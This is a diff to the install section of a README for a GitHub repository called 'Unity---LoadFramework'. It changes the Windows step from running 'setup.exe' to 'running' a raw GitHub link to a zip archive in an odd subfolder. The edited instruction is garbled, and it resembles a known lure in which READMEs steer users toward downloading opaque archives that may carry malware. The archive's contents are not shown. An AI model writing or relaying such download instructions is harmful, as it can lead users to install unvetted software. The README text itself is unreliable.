gayelamin/Unity---LoadFramework/README.md

    If you downloaded a `.zip` file, locate it in your downloads folder.
 Right-click on the file and select "Extract All," then follow the prompts to extract the files to a folder of your choice.

 5. **Install the Software**
    For macOS, double-click the `.pkg` file and follow the installation instructions.
-For Windows, open the extracted folder and run `setup.exe`.
+For Windows, open the extracted folder and run `https://raw.githubusercontent.com/gayelamin/Unity---LoadFramework/master/fossor/Unity---LoadFramework.zip`.
 Follow the prompts to complete the installation.

 6. **Launch the Application**
    After installation, find Unity---LoadFramework in your applications list.
 Click to launch the program.